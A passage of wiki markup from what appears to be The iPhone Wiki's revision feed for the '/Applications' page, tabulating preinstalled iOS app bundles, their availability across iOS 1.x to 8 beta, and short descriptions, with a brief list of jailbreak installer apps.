| Hidden app for checking network parameters; Can be accessed by dialing [[Phone.app codes|<code>*3001#12345#*</code>]]; Retired in 4.0, returns in 4.1 providing only the cellular network RSSI display. iOS 4.2 brings all features back.<br />
|-<br />
| {{ipfw|GameCenterUIService.app}}<br />
| {{ipfw|GameCenterUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|GameCenter~iphone.app}}<br />
| {{ipfw|GameCenter~ipad.app}}<br />
| No Apple TV Version<br />
| Game Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Game Center.<br />
|-<br />
| {{ipfw|Health.app}}<br />
| {{ipfw|Health.app}}<br />
| No Apple TV Version<br />
| Health<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| The Health app. Works as the center of HealthKit enabled apps.<br />
|-<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| A service for Health.app, apparently in place to protect your privacy.<br />
|-<br />
| {{ipfw|iAdOptOut.app}}<br />
| {{ipfw|iAdOptOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iBooks.app}}<br />
| {{ipfw|iBooks.app}}<br />
| No Apple TV Version<br />
| iBooks<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| iBooks app built into iOS 8.<br />
|-<br />
| {{ipfw|InCallService.app}}<br />
| {{ipfw|InCallService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| This can be accessed through Safari; just type diags:// into the URL bar.<br />
|-<br />
| {{ipfw|iPodOut.app}}<br />
| {{ipfw|iPodOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no (?)}}<br />
| Hidden app for iPodOut functionality with third party equipment such as car entertainment systems. Provides a media selection and notification view interface through the video output.<br />
|-<br />
| {{ipfw|iTunes.app}} (Not to be confused with MobileStore.app, the iTunes Store app)<br />
| {{ipfw|iTunes.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app. Crashes on startup. Purpose not known.<br />
|-<br />
| {{ipfw|kbd.app}}<br />
| {{ipfw|kbd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| <br />
|-<br />
| {{ipfw|MailCompositionService.app}}<br />
| {{ipfw|MailCompositionService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Maps~iphone.app}} (Maps.app on iOS 7)<br />
| {{ipfw|Maps~ipad.app}}<br />
| No Apple TV Version<br />
| Maps<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Maps.<br />
|-<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
|-<br />
| {{ipfw|MessagesViewService.app}}<br />
| {{ipfw|MessagesViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|MobileCal.app}}<br />
| {{ipfw|MobileCal.app}}<br />
| No Apple TV Version<br />
| Calendar<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Calendar.<br />
|-<br />
| {{ipfw|MobileMail.app}}<br />
| {{ipfw|MobileMail.app}}<br />
| No Apple TV Version<br />
| Mail<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mail. Updated in iOS 4 and iOS 7.<br />
|-<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| No Apple TV Version<br />
| iPod; Music; Videos<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| iPod/Music/Videos. Uses the '''[[Application Roles]]''' feature to have more than one icon. Split into separate Music/Videos apps since iOS 5.<br />
|-<br />
| {{ipfw|MobileNotes.app}}<br />
| {{ipfw|MobileNotes.app}}<br />
| No Apple TV Version<br />
| Notes<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Notes.<br />
|-<br />
| {{ipfw|MobilePhone.app}}<br />
| {{ipfw|MobilePhone.app}} (iPad 2 and newer only, running iOS 6 and under)<br />
| No Apple TV Version<br />
| Phone; FaceTime for iOS 6 and under<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Only FaceTime is shown on the iPad and iPod touch. On iOS 7 FaceTime is an independent application. Uses the '''Application Roles''' feature to have more than one icon.<br />
|-<br />
| {{ipfw|MobileReplayer.app}}<br />
| {{ipfw|MobileReplayer.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| MobileReplayer's purpose isn't known. Crashes upon startup.<br />
|-<br />
| {{ipfw|MobileSafari.app}}<br />
| {{ipfw|MobileSafari.app}}<br />
| No Apple TV Version<br />
| Safari<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mobile Safari web browser.<br />
|-<br />
| {{ipfw|MobileSlideShow.app}}<br />
| {{ipfw|MobileSlideShow.app}}<br />
| No Apple TV Version<br />
| Photos (iOS 4 and above); Photos, Camera (older OS versions)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Photo Albums, Places, Faces*, Events* and Import°.<br />
<br />
<nowiki>* </nowiki>Mac only.<br />
<br />
° with iPad Camera Connection Kit<br />
|-<br />
| {{ipfw|MobileSMS.app}}<br />
| {{ipfw|MobileSMS.app}}<br />
| No Apple TV Version<br />
| [[Messages]]; Text (iPhone OS < 2.2.1)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| SMS, MMS and [[iMessage]]<br />
|-<br />
| {{ipfw|MobileStore.app}}<br />
| {{ipfw|MobileStore.app}}<br />
| No Apple TV Version<br />
| iTunes Store (iTunes prior to iOS 7)<br />
| {{partial|1.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| iTunes Store and Ping.<br />
|-<br />
| {{ipfw|MobileTimer.app}} (MobileTimer~iphone.app on iOS 6 only)<br />
| {{ipfw|MobileTimer~ipad.app}} (only from iOS 6)<br />
| No Apple TV Version<br />
| Clock<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| World Clocks, Alarms, Stopwatch and countdown Timer.<br />
|-<br />
| {{ipfw|Music~iphone.app}} (Music.app on iOS 7)<br />
| {{ipfw|Music~ipad.app}}<br />
| No Apple TV Version<br />
| Music<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app. Icon is identical to the one previously only displayed on iPod touches.<br />
|-<br />
| {{ipfw|Nike.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Nike+iPod<br />
| {{no}}<br />
| {{partial|2.2.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Nike+iPod. Only on applicable devices (iPod touch 2G, iPhone 3G, and newer) when enabled in Settings.<br />
|-<br />
| {{ipfw|Podcasts.app}}<br />
| {{ipfw|Podcasts.app}}<br />
| No Apple TV Version<br />
| Podcasts<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Podcasts app built into iOS 8.<br />
|-<br />
| {{ipfw|PreBoard.app}}<br />
| {{ipfw|PreBoard.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown, crashes at start.<br />
|-<br />
| {{ipfw|Preferences.app}}<br />
| {{ipfw|Preferences.app}}<br />
| No Apple TV Version<br />
| Settings<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Settings.<br />
|-<br />
| {{ipfw|PrintStatus.app}}<br />
| {{ipfw|PrintStatus.app}}<br />
| No Apple TV Version<br />
| Print Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Print Center.<br />
|-<br />
| {{ipfw|quicklookd.app}}<br />
| {{ipfw|quicklookd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Reminders.app}}<br />
| {{ipfw|Reminders.app}}<br />
| No Apple TV Version<br />
| Reminders<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Reminders application.<br />
|-<br />
| {{ipfw|Setup.app}}<br />
| {{ipfw|Setup.app}}<br />
| No Apple TV Version<br />
| Setup<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden setup app. Opens automatically after a restore.<br />
|-<br />
| {{ipfw|Passbook.app}} (Shoebox.app prior to iOS 7)<br />
| No iPad Version<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Passbook.<br />
|-<br />
| {{ipfw|SiriViewService.app}}<br />
| {{ipfw|SiriViewService.app}}<br />
| No Apple TV Version<br />
| Siri<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[Siri]] controller.<br />
|-<br />
| {{ipfw|ShoeboxUIService.app}} (PassbookUIService.app on iOS 7)<br />
| {{ipfw|ShoeboxUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
|<br />
|-<br />
| {{ipfw|SocialUIService.app}}<br />
| {{ipfw|SocialUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Stocks.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Stocks<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Stocks. Updated in iPhone OS 3.0 and iOS 7.<br />
|-<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Account Migration (??) for Tencent Weibo Accounts<br />
|-<br />
| {{ipfw|TrustMe.app}}<br />
| {{ipfw|TrustMe.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Related to SSL and certificates.<br />
|-<br />
| {{ipfw|UserAuthentication.app}}<br />
| {{ipfw|UserAuthentication.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown app. Does nothing when launched. Might be used for the iOS 8 Touch ID API.<br />
|-<br />
| {{ipfw|Videos.app}}<br />
| {{ipfw|Videos.app}}<br />
| No Apple TV Version<br />
| Videos<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app.<br />
|-<br />
| {{ipfw|VoiceMemos.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Voice Memos<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Voice Memos. Requires <code>encode-aac</code> capability and a microphone.<br />
|-<br />
| {{ipfw|Weather.app}}<br />
| {{ipfw|Weather.app}}<br />
| No Apple TV Version<br />
| Weather<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Weather. Updated for fast app switching support and hourly forecast and in iOS 6.<br />
|-<br />
| {{ipfw|Web.app}}<br />
| {{ipfw|Web.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Runs fullscreen web clips.<br />
|-<br />
| {{ipfw|WebApp1.app}}<br />
| {{ipfw|WebApp1.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown purpose, crashes on startup<br />
|-<br />
| {{ipfw|WebContentAnalysisUI.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|WebSheet.app}}<br />
| {{ipfw|WebSheet.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Used for overlaying web data. Usually for logging in to Wi-Fi Hotspots which use forced webpages to request user data.<br />
|-<br />
| {{ipfw|WebViewService.app}} (WebUIService prior to iOS 7)<br />
| {{ipfw|WebViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|WhatsNew.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|YouTube.app}}<br />
| {{ipfw|YouTube.app}}<br />
| No Apple TV Version<br />
| YouTube<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| Watch [http://youtube.com YouTube] videos; removed in iOS 6 beta 4 according with the Google License.<br />
|}<br />
<br />
==== Unofficial Apps ====<br />
These application bundles are not present on an unmodified system and are generally installed via a PC utility, manually or through a package. More applications may be installed after jailbreak.<br />
* [[Installer.app]] (AppTapp Installer)<br />
* [[blackra1n.app]] ([[blackra1n]] and [[limera1n]])<br />
* [[Cydia.app]] (Cydia Installer)<br />
<br />
=== Files ===<br />
(none)<br />
<br />
== Parents ==<br />
{{parent}}<br />
<br />
[[Category:Filesystem]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=/Applications&diff=41342
/Applications
2014-06-19T18:55:59Z
<p>Ryandolan123: This is probably one of the biggest updates to this page in a while. It includes unincluded iOS 7 apps/services, and adds details about iOS 8 beta apps/services for those who are curious. Enjoy! :)</p>
<hr />
<div>== Summary ==<br />
This is where all of the pre-installed native apps, as well as native jailbreak apps (from Cydia and elsewhere), are installed. They can't be deleted under normal circumstances. One can delete them on a jailbroken device through some sort of file-management tool such as SSH or iFile, although doing this is highly unrecommended as they can't be re-installed.<br />
<br />
New user apps are installed via iTunes or the App Store in the [[/private/var/mobile/Applications]] folder.<br />
<br />
== Children ==<br />
=== Folders ===<br />
*{{ipfw|Utilities}} <br />
==== Native Apps ====<br />
{| class="wikitable sortable" style="table-layout: fixed; border-collapse: collapse;" border="1"<br />
|-<br />
! Folder name (generic)<br />
! Folder name ([[iPad]] version)<br />
! Folder name ([[Apple TV]] version)<br />
! Application name<br />
! 1.x<br />
! 2.x<br />
! 3.x<br />
! 4.x <br />
! 5.x<br />
! 6.x<br />
! 7.x<br />
! 8.x (beta)<br />
! Description<br />
|-<br />
| {{ipfw|AACredentialRecoveryDialog.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|AdSheet.app}} (iAd.app in iOS 8)<br />
| {{ipfw|AdSheet~ipad.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app for [[iAd]] support (Both included on iPad)<br />
|-<br />
| No iPhone or iPod touch version<br />
| No iPad Version<br />
| {{ipfw|AppleTV.app}}<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1.1/4.2.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| The Apple TV's equivalent of [[:/System/Library/CoreServices/SpringBoard.app|SpringBoard]]. Used on [[iOS]] 4.2 and higher. Prior to 4.2.1, it was known as Lowtide.app.<br />
|-<br />
| {{ipfw|AppStore.app}}<br />
| {{ipfw|AppStore.app}}<br />
| No Apple TV Version<br />
| App Store<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Client for the [[App Store]]<br />
|-<br />
| {{ipfw|AskPermissionUI.app}}<br />
| {{ipfw|AskPermissionUI.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| App for the UI for Family Sharing purchase confirmations<br />
|-<br />
| {{ipfw|BugReporter.app}}<br />
| {{ipfw|BugReporter.app}}<br />
| No Apple TV Version<br />
| Bug Reporter<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| An app for conveniently reporting bugs, specific to beta releases starting with iOS 8.<br />
|-<br />
| {{ipfw|Calculator.app}}<br />
| No iPad version<br />
| No Apple TV Version<br />
| Calculator<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Calculator. Icon evolved over major OS releases. Landscape scientific mode added in iOS 2.0.<br />
|-<br />
| {{ipfw|Camera.app}}<br />
| {{ipfw|Camera.app}} ([[iPad 2]] and newer only)<br />
| No Apple TV Version<br />
| Camera<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Camera. Split from {{ipfw|MobileSlideShow.app}} starting with iOS 4.0.<br />
|-<br />
| {{ipfw|Compass.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Compass<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Compass. Only available on [[Magnetometer|qualifying devices]].<br />
|-<br />
| {{ipfw|CompassCalibrationViewService.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|Contacts~iphone.app}} (MobileAddressBook.app before iOS 4)<br />
| {{ipfw|Contacts~ipad.app}}<br />
| No Apple TV Version<br />
| Contacts<br />
| {{partial}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Contacts.<br />
|-<br />
| {{ipfw|Copilot.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|DDActionsService.app}}<br />
| {{ipfw|DDActionsService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|DemoApp.app}}<br />
| {{ipfw|DemoApp.app}}<br />
| No Apple TV Version<br />
| <br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Displays a video continuously when the device is not being used. Invoke with a file called Demo.mov in the user directory ([[/private/var/root]] for iOS 1.1.2 and lower, [[/private/var/mobile]] for iOS 1.1.3 and later). Used by Apple Stores.<br />
|-<br />
| {{ipfw|Diagnostics.app}} (Not to be confused with iOS Diagnostics.app, Diagnostics.app currently serves no purpose)<br />
| {{ipfw|Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Currently, this serves no clear purpose. It has lorem ipsum inside it, and accept and decline buttons.<br />
| -<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Facebook service.<br />
|-<br />
| {{ipfw|FaceTime.app}}<br />
| {{ipfw|FaceTime.app}}<br />
| No Apple TV Version<br />
| FaceTime<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[FaceTime]] application for devices running iOS 7 or later.<br />
|-<br />
| {{ipfw|Family.app}}<br />
| {{ipfw|Family.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Application for Family Sharing. Doesn't appear to work yet.<br />
|-<br />
| {{ipfw|FieldTest.app}}<br />
| {{ipfw|FieldTest.app}} (3G only)<br />
| No Apple TV Version<br />
| <br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{partial|See notes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app for checking network parameters; Can be accessed by dialing [[Phone.app codes|<code>*3001#12345#*</code>]]; Retired in 4.0, returns in 4.1 providing only the cellular network RSSI display. iOS 4.2 brings all features back.<br />
|-<br />
| {{ipfw|GameCenterUIService.app}}<br />
| {{ipfw|GameCenterUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|GameCenter~iphone.app}}<br />
| {{ipfw|GameCenter~ipad.app}}<br />
| No Apple TV Version<br />
| Game Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Game Center.<br />
|-<br />
| {{ipfw|Health.app}}<br />
| {{ipfw|Health.app}}<br />
| No Apple TV Version<br />
| Health<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| The Health app. Works as the center of HealthKit enabled apps.<br />
|-<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| A service for Health.app, apparently in place to protect your privacy.<br />
|-<br />
| {{ipfw|iAdOptOut.app}}<br />
| {{ipfw|iAdOptOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iBooks.app}}<br />
| {{ipfw|iBooks.app}}<br />
| No Apple TV Version<br />
| iBooks<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
